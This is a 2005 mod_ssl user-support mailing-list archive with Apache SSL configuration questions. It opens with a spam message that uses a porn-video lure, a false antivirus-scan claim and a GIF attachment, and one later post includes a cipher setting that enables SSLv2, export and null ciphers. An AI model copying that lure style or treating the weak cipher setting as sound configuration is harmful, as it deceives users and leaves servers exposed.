	id 8367D14EAB7; Fri, 15 Apr 2005 06:57:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.30.6.168 (CPE0004764da6d1-CM014340029021.cpe.net.cable.rogers.com [24.103.74.128])
	by master.modssl.org (Postfix) with SMTP id 926BE14DD98
	for ; Fri, 15 Apr 2005 06:57:18 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: Re: Why? Form Back.mpg
Date: 15 Apr 2005 01:57:16 -0400
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20050415045718.926BE14DD98@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


very good movie        >>> Video's Media Player. SEX SEX * Sluts Tits Video Mpeg's Mpeg Video Clips
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 21 18:45:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 77B8B14EAC2; Thu, 21 Apr 2005 18:45:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rproxy.gmail.com (rproxy.gmail.com [64.233.170.204])
	by master.modssl.org (Postfix) with ESMTP id 1351814DCB8
	for ; Thu, 21 Apr 2005 18:45:06 +0200 (CEST)
Received: by rproxy.gmail.com with SMTP id z35so477826rne
        for ; Thu, 21 Apr 2005 09:45:05 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=iLlZ2/Av1y1XMC+624NzQRBKlP+zEK2AsuNj/xrqgUeQDTG5mlZevzinhkJag2mc9QzEleuDYhll+nC0HHOE2KIRMASib1lj6bCZG1LizpQ2z0w0otGyJFBATXMxW81BqYjwmA1R7qd09SDykBMMkZfhw7qayF4u1227jG/pnzI=
Received: by 10.38.78.59 with SMTP id a59mr2432104rnb;
        Thu, 21 Apr 2005 09:45:05 -0700 (PDT)
Received: by 10.38.181.11 with HTTP; Thu, 21 Apr 2005 09:45:05 -0700 (PDT)
Message-ID: 
Date: Thu, 21 Apr 2005 18:45:05 +0200
From: =?ISO-8859-2?Q?Miha_Re=B9=E8i=E8?= 
To: modssl-users@modssl.org
Subject: Custom parameter fields in x.509 certificates and SSLRequire in .htaccess file
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-2?Q?Miha_Re=B9=E8i=E8?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

I inserted some new DN fields into a x.509 certificate via the openssl
req config file. Example:
[ req ]
...
groupName                        =3D Group Name
groupName_default             =3D not_defined
groupName_max                =3D 40
...

Now, I can add the new field value this way:

openssl req ... -subj '/.../GN=3DGroupName/...'

and it actually works. Although, after signing and exporting, the
field viewed in Mozilla shows a different name, not GN but

Object Identifier (2 5 4 42 ) =3D GroupName

And now for the question: how do I make the .htaccess file consider
(or use, view) this new parameter to restrict access?

Thank you
Miha
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr 27 21:50:28 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E70F014EA9A; Wed, 27 Apr 2005 21:50:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.203])
	by master.modssl.org (Postfix) with ESMTP id 8EB0914DEB9
	for ; Wed, 27 Apr 2005 21:50:04 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 69so380099wri
        for ; Wed, 27 Apr 2005 12:50:04 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=p64pGqamGR6+APOUveCXBmPp73tSW8yN+9EK1Pr/i75H6exyXF5kaTgDjU0y0SxFHDaNywF+z2cQp0jTaqcxDbF1WrNZxH19kPBTWk3EM2hEYdv73F4d2HRrAlnuIkBGHqbk1CtxsK7N3qCo+9RucB9lMFD8i4ymT3hgW4/XbqM=
Received: by 10.54.124.5 with SMTP id w5mr354477wrc;
        Wed, 27 Apr 2005 12:50:04 -0700 (PDT)
Received: by 10.54.34.36 with HTTP; Wed, 27 Apr 2005 12:50:04 -0700 (PDT)
Message-ID: <1b1fea0b050427125070944150@mail.gmail.com>
Date: Wed, 27 Apr 2005 15:50:04 -0400
From: Mike Fuller 
To: modssl-users@modssl.org
Subject: SSL handshake timed out
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Fuller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have a an Sparc appllication server running Solaris 5.9.  It uses:

apache 1.3.31
mod_ssl 1.3.31
Sun Crypto Accelerator (instead of open ssl, an SSL card)

I have multiple clients that are able to connect without error, but a
new client has a load balancing proxy server which is handling the SSL
requests comes close to crashing my server.  It seems to try to bridge
sessions across their different proxy ip addresses, and they all hang
on my server until it gets clogged.

I have identified it as a client issue due to the immediate resolution
of the issue when they remove this system from the loop, but wanted to
know if anyone had any experience dealing with this type of issue from
the server side, and how to manage the SSL handshakes repeatedly
timing out.

These are the errors I receive from apache when they are connecting
through this load balancing proxy server:

[Wed Apr 27 15:19:42 2005] [error] mod_ssl: SSL handshake timed out
(client 63.xx.xx.xx, server qa.xxxxx.com:443)

When doing a netstat it seems like all of these sessions are in TIME_WAIT s=
tate.

I would appreciate any help with issue.

Thanks,

/mike fuller
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 28 12:17:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8BD3514EAA9; Thu, 28 Apr 2005 12:17:41 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25006.mail.ukl.yahoo.com (web25006.mail.ukl.yahoo.com [217.12.10.42])
	by master.modssl.org (Postfix) with SMTP id 3E16914DCA1
	for ; Thu, 28 Apr 2005 12:17:38 +0200 (CEST)
Received: (qmail 94292 invoked by uid 60001); 28 Apr 2005 10:17:38 -0000
Message-ID: <20050428101738.94290.qmail@web25006.mail.ukl.yahoo.com>
Received: from [81.217.9.62] by web25006.mail.ukl.yahoo.com via HTTP; Thu, 28 Apr 2005 11:17:38 BST
Date: Thu, 28 Apr 2005 11:17:38 +0100 (BST)
From: Raueber Hotzenplotz 
Subject: Apache Webserver + mod_ssl = Certificate Authority Server ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Raueber Hotzenplotz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I need a local CA server that accepts Certificate
Creation Requests from clients, which are written in
Java, via HTTP (maybe XML RPC). The clients create
their own public/private key (automatically upon
installation) and send the public key + personal info
to the local CA server to get a signed certificate
back. 

Is it possible to setup Apache Webserver + mod_ssl to
act as a CA server?

What CA server would you use - should be open-source,
well documented and easy to understand? 

Thanks!

Send instant messages to your online friends http://uk.messenger.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 29 18:44:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CEE7914EA9D; Fri, 29 Apr 2005 18:44:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sobobcat.sysoff.ctstateu.edu (sobobcat.sysoff.ctstateu.edu [149.152.13.10])
	by master.modssl.org (Postfix) with ESMTP id 7821A14DCB8
	for ; Fri, 29 Apr 2005 18:44:33 +0200 (CEST)
Subject: mod-ssl error... HELP!
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 6.5.3 September 14, 2004
Message-ID: 
From: "Kevin Suares" 
Date: Fri, 29 Apr 2005 12:44:42 -0400
X-MIMETrack: Serialize by Router on Bobcat/SR/CSUSO(5012HF794|September 27, 2004) at 04/29/2005
 12:44:46 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin Suares" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello, all:
      I am new to the forum and to mod-ssl, so please forgive me if this
questionhas been answered previously.

I have Apache 1.3.33 running the lateest mod-ssl (0.97x) on a Windows 2003
Standard Server which I have installed a certificate from a noted
certificate authority. I previously ran Apache on this server without
mod-ssl successfully for about a year.

When I install mod-ssl, the Apache load fails, and I get the following
error in the SSL logs:

Init: Configuring server [:443] for SSL protocol
[26/Apr/2005 11:15:00 00816] [warn]  Init: ([:443]) RSA server
certificate CommonName (CN) `[]' does NOT match server name!?
[26/Apr/2005 11:15:00 00816] [error] Init: ([:443]) Unable to
configure RSA server private key (OpenSSL library error follows)
[26/Apr/2005 11:15:00 00816] [error] OpenSSL: error:0B080074:x509
certificate routines:X509_check_private_key:key values mismatch

The server then exits.

I googled the error and it seems to be somewhat common across platforms,
but I have not seen any fix or solution posted for this.

HELP!!!!



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May  5 19:01:35 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2DF5A14EABF; Thu,  5 May 2005 19:01:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.196])
	by master.modssl.org (Postfix) with ESMTP id 9CC2514EAA1
	for ; Thu,  5 May 2005 19:01:31 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 69so656949wri
        for ; Thu, 05 May 2005 10:01:22 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=hFH208CLsUkTupNKKu6FeIeIGNy7L+m/nC23e3wd/ksl37j5snA9CJsZ5ELVgnoBnMJ5aJMWzTOCLT1mMrUMTGMmdjt/P6gXmW7lbhHnKwBhm3eWK+ztRsdM2A1eQVkKBtKLPx79dds0zcEi0fTm/bS5JF6uPhRbT9BlGo7WsW0=
Received: by 10.54.29.33 with SMTP id c33mr315192wrc;
        Thu, 05 May 2005 10:01:22 -0700 (PDT)
Received: by 10.54.34.36 with HTTP; Thu, 5 May 2005 10:01:21 -0700 (PDT)
Message-ID: <1b1fea0b050505100168b99c03@mail.gmail.com>
Date: Thu, 5 May 2005 13:01:21 -0400
From: Mike Fuller 
To: modssl-users@modssl.org
Subject: Re: SSL handshake timed out
In-Reply-To: <1b1fea0b050427125070944150@mail.gmail.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <1b1fea0b050427125070944150@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Fuller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Can anyone help me with this issue?

On 4/27/05, Mike Fuller  wrote:
> I have a an Sparc appllication server running Solaris 5.9.  It uses:
>=20
> apache 1.3.31
> mod_ssl 1.3.31
> Sun Crypto Accelerator (instead of open ssl, an SSL card)
>=20
> I have multiple clients that are able to connect without error, but a
> new client has a load balancing proxy server which is handling the SSL
> requests comes close to crashing my server.  It seems to try to bridge
> sessions across their different proxy ip addresses, and they all hang
> on my server until it gets clogged.
>=20
> I have identified it as a client issue due to the immediate resolution
> of the issue when they remove this system from the loop, but wanted to
> know if anyone had any experience dealing with this type of issue from
> the server side, and how to manage the SSL handshakes repeatedly
> timing out.
>=20
> These are the errors I receive from apache when they are connecting
> through this load balancing proxy server:
>=20
> [Wed Apr 27 15:19:42 2005] [error] mod_ssl: SSL handshake timed out
> (client 63.xx.xx.xx, server qa.xxxxx.com:443)
>=20
> When doing a netstat it seems like all of these sessions are in TIME_WAIT=
 state.
>=20
> I would appreciate any help with issue.
>=20
> Thanks,
>=20
> /mike fuller
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 10 11:58:07 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5A25A14EAC6; Tue, 10 May 2005 11:58:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sunu007.rz.ruhr-uni-bochum.de (sunu007.rz.ruhr-uni-bochum.de [134.147.64.14])
	by master.modssl.org (Postfix) with SMTP id E60F814DCA1
	for ; Tue, 10 May 2005 11:58:06 +0200 (CEST)
Received: (qmail 14477 invoked from network); 10 May 2005 09:58:06 -0000
Received: from p508eca02.dip.t-dialin.net (HELO mainframe) (loescsbx@80.142.202.2)
  by mail.ruhr-uni-bochum.de with SMTP; 10 May 2005 09:58:06 -0000
From: =?iso-8859-1?Q?Sven_L=F6schner?= 
To: 
Subject: SSLClientVerify fails
Date: Tue, 10 May 2005 11:58:25 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.6353
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Thread-Index: AcVVRs696/x0iv7JQxyHvu36ABtswg==
Message-Id: <20050510095806.E60F814DCA1@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?Sven_L=F6schner?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello, 

I am using openSSL 0.9.7b, Apache/2.0.48 and mod_ssl/2.0.48 on a SuSE 9.0
machine.

I try to configure a site (more specific: a folder on a site) using
Client-Verify. But in IE I get an endless loop, and in Firefox I get "Error
-8101". The Log-File says 

[error] Re-negotiation handshake failed: Not accepted by client!?
chid pid 10800 exit signal Segmentation fault (11)

I tried with debug-logging, here is a little part of the logging:

Mon May 09 18:24:10 2005] [debug] ssl_engine_io.c(1518): OpenSSL: I/O error,
5 bytes expected to read on BIO#8240630 [mem: 8247cb0] [Mon May 09 18:24:10
2005] [debug] ssl_engine_kernel.c(1830): OpenSSL: Exit: error in SSLv3 read
client certificate A [Mon May 09 18:24:10 2005] [error] Re-negotiation
handshake failed: Not accepted by client!?

Thanks in advance for any idea.

Sven


This is how i implemented it:


    SSLVerifyClient none
    SSLEngine on
    SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
    SSLProtocol all

    SSLOptions +StdEnvVars +ExportCertData
    LogLevel debug

    SSLCertificateFile /etc/ssl/server.pem
    SSLCertificateKeyFile /etc/ssl/server.key
    SSLCACertificateFile /etc/ssl/cacert.pem
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown


   
     SSLRequireSSL
     SSLVerifyClient require
     SSLVerifyDepth 1
   

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 10 12:48:38 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1E95814EA9F; Tue, 10 May 2005 12:48:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ciao.gmane.org (main.gmane.org [80.91.229.2])
	by master.modssl.org (Postfix) with ESMTP id DC47E14DCA1
	for ; Tue, 10 May 2005 12:48:37 +0200 (CEST)
Received: from root by ciao.gmane.org with local (Exim 4.43)
	id 1DVSAL-0000fm-D8
	for modssl-users@modssl.org; Tue, 10 May 2005 12:40:41 +0200
Received: from p508eca02.dip.t-dialin.net ([80.142.202.2])
        by main.gmane.org with esmtp (Gmexim 0.1 (Debian))
        id 1AlnuQ-0007hv-00
        for ; Tue, 10 May 2005 12:40:41 +0200
Received: from sven.loeschner by p508eca02.dip.t-dialin.net with local (Gmexim 0.1 (Debian))
        id 1AlnuQ-0007hv-00
        for ; Tue, 10 May 2005 12:40:41 +0200
X-Injected-Via-Gmane: http://gmane.org/
To: modssl-users@modssl.org
From: "Sven Löschner" 
Subject:  SSLVerifyClient fails
Date:  Tue, 10 May 2005 12:44:15 +0200
Lines: 46
Message-ID: 
X-Complaints-To: usenet@sea.gmane.org
X-Gmane-NNTP-Posting-Host: p508eca02.dip.t-dialin.net
X-MSMail-Priority: Normal
X-Newsreader: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
X-RFC2646: Format=Flowed; Original
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sven Löschner" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I am using openSSL 0.9.7b, Apache/2.0.48 and mod_ssl/2.0.48 on a SuSE 9.0 
machine.
I try to configure a site (more specific: a folder on a site) using 
Client-Verify. But in IE I get an endless loop, and in Firefox I get 
"Error -8101". The Log-File says

[error] Re-negotiation handshake failed: Not accepted by client!?
chid pid 10800 exit signal Segmentation fault (11)

I tried with debug-logging, here is a little part of the logging:

Mon May 09 18:24:10 2005] [debug] ssl_engine_io.c(1518): OpenSSL: I/O error, 
5 bytes expected to read on BIO#8240630 [mem: 8247cb0] [Mon May 09 18:24:10 
2005] [debug] ssl_engine_kernel.c(1830): OpenSSL: Exit: error in SSLv3 read 
client certificate A [Mon May 09 18:24:10 2005] [error] Re-negotiation 
handshake failed: Not accepted by client!?

Thanks in advance for any idea.

Sven

This is how i implemented it:


    SSLVerifyClient none
    SSLEngine on
    SSLCipherSuite 
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
    SSLProtocol all
    SSLOptions +StdEnvVars +ExportCertData
    LogLevel debug
    SSLCertificateFile /etc/ssl/server.pem
    SSLCertificateKeyFile /etc/ssl/server.key
    SSLCACertificateFile /etc/ssl/cacert.pem
    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown



    SSLRequireSSL
    SSLVerifyClient require
   SSLVerifyDepth 1




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun May 15 10:00:48 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0DAC014EAA0; Sun, 15 May 2005 10:00:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (bay102-f4.bay102.hotmail.com [64.4.61.14])
	by master.modssl.org (Postfix) with ESMTP id 1561F14DCE6
	for ; Sun, 15 May 2005 10:00:46 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Sun, 15 May 2005 01:00:45 -0700
Message-ID: 
Received: from 64.4.61.210 by by102fd.bay102.hotmail.msn.com with HTTP;
	Sun, 15 May 2005 08:00:44 GMT
X-Originating-IP: [64.4.61.210]
X-Originating-Email: [zaczekmariusz@hotmail.com]
X-Sender: zaczekmariusz@hotmail.com
From: "Mariusz Zaczek" 
To: modssl-users@modssl.org
Cc: zaczekmariusz@hotmail.com
Subject: ITAR(Export Control) Restrictions and use of SSL in the United States?
Date: Sun, 15 May 2005 08:00:44 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 15 May 2005 08:00:45.0320 (UTC) FILETIME=[32A38880:01C55924]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mariusz Zaczek" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Having read the article "Apache and Secure Transactions" at  
http://www.apacheweek.com/features/ssl  I have some questions on what this 
means to
a website developer.

In particular the summary of this site states the following:
--------------------------------------------------------------------------------------------------------------
Inside the US and Canada
    Either
       1. Buy a Verisign-accredited, RSA licensed server (such as 
Stronghold) or
          add Raven to Apache, and buy a certificate,
    Or
       2. Download Apache and Apache-SSL or mod_ssl patches, compile, pay
           RSA license for RSA-patented technology, and buy a certificate or
            sign own certificate (however RSA may not license RSA to 
individuals)
--------------------------------------------------------------------------------------------------------------

Obviously I am in the US and I want to use ssl and I want to fulfill all of 
the legal
requirements of doing so but I'm a bit confused on what the above means.

Question 1:
First of, Apache does not include SSL (within the US) and so it must be 
separately
installed (compiled with the Apache http source)...does the Apache source 
provide
a Microsoft Visual Studio workspace for easy compilation on Windows? ... I 
can't check
because the link to the win32 source is currently dead (404 error).

Question 2:
Is getting an RSA license different then buying a certificate? It seems like 
it is but I
know nothing about this so maybe someone can tell me how easy this is to do?
Does it cost a lot?

Question 3:
I'm using Jakarta Tomcat to do Java Servlets and it has a built in HTTPS 
capability...why
doesn't Apache?  Am I using this feature of Tomcat illegally since I'm in 
the US...I mean
should I not be using SSL until I get the RSA license?

Question 4:
This question relates to Apache HTTP server and Tomcat Server running 
together...has anyone
done this and if so, can you recommend a course of action? I need apache for 
mostly
PHP support (eg to use myPhpAdmin tool) and then I figure I'd use Tomcat to 
do my actual
Java Servlet website serving...or should I use Apache for this as well?


I do apologize if these questions are rather low level but I'm new to the 
SSL export control
issue...given that in Tomcat I can simply uncomment a small section and all 
my Java Servlet
books fail to mention any SSL export control issues I was oblivious to this 
problem until I figured
out I'd need to have a server capable of processing PHP requests (Tomcat 
does not, but
Apache HTTP does)...hence I needed to install Apache and then I came upon 
this issue.

Thank you for your help,

Mariusz "Mario" Zaczek


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

